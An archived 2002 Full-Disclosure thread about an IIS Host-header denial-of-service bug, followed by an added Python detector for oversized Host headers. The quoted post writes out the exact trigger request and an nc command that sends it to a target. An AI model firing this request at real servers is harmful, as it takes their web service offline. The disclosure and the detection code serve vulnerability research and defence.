Heh. I thought my screenshot DID show exactly how to reproduce the bug: You run SPIKE! :>

You can download SPIKE 2.7 at http://www.immunitysec.com/spike.html - it's the exact version I used in the demonstration screenshot.

You should read my actual commentary on the bug. The bug is actually IIS servicing a stack overflow exception, and is not limited to /_vti_bin/shtml.dll or any other particular file or directory. It also affects IIS 5.1. It's not limited to the Host: field, as far as I can tell. Any "stack overflow" exception will trigger this behavior.

Dave Aitel
Immunity, Inc.

On Fri, 2002-10-11 at 19:26, Joe Testa wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - From the screenshots and descriptions given in
> <http://online.securityfocus.com/bid/5907>, it's not clear *exactly* how to
> reproduce the IIS Host header DoS.
>
> A POST request like the following (between the [begin] and [end] lines) will
> manually reproduce the IIS DoS condition:
>
> - -------------------------[begin]--------------------------------------
> POST /_vti_bin/shtml.dll HTTP/1.0
> Host: [32762 '/' characters]
> Content-length: 22
>
> http://www.rapid7.com/
> - --------------------------[end]---------------------------------------
>
> This will cause the web service to consume 99% of the CPU for about 35
> seconds. During this time, no other HTTP requests will be serviced. Attached
> to this email is the complete string to facilitate testing. Use it with:
>
> $ nc x.x.x.x 80 < iis_dos
>
> - Joe Testa, Rapid 7, Inc.
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
> A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (Cygwin32)
>
> iD8DBQE9p1w3V+UY4AKwCDkRAjHQAJ0Vx5c1rJvDY5+n2595Wq6NQbqwOACeNBBO
> GcA6qrjAE1Tj+Jqx3kE9U4Q=
> =RkVz
> -----END PGP SIGNATURE-----
>
> (See attached file: iis_dos)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Sun Oct 13 2002 - 02:28:03 PDT
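A defensive check for the request shape described in the thread, added here as an illustration and not code from either poster: it parses a raw HTTP/1.x request and flags an abnormally long Host header. The 1024-byte threshold and the two sample requests are constructed for the example; the long sample mirrors the 32762-character Host value from the post.

```python
"""Flag HTTP requests whose Host header is abnormally long.

Added illustration for the IIS Host-header DoS discussed in the thread.
The length limit is an assumed value chosen for the example.
"""
from typing import Dict, Optional, Tuple

# Assumption: legitimate Host values are far shorter than this; the
# trigger in the post used 32762 '/' characters.
MAX_HOST_LEN = 1024


def parse_request_headers(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into its request line and headers.

    Header names are lower-cased; only the part before the blank line
    that ends the header block is parsed, the body is ignored.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # not a header line
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return request_line, headers


def oversized_host(raw: bytes, limit: int = MAX_HOST_LEN) -> Optional[str]:
    """Return a finding if the Host header exceeds `limit` bytes, else None."""
    request_line, headers = parse_request_headers(raw)
    host = headers.get("host", "")
    if len(host) > limit:
        return f"{request_line}: Host header is {len(host)} bytes (limit {limit})"
    return None


# Constructed sample requests; SUSPECT has the shape shown in the post.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
SUSPECT = (b"POST /_vti_bin/shtml.dll HTTP/1.0\r\nHost: " + b"/" * 32762
           + b"\r\nContent-length: 22\r\n\r\nhttp://www.rapid7.com/")

if __name__ == "__main__":
    for req in (BENIGN, SUSPECT):
        print(oversized_host(req) or "ok")
```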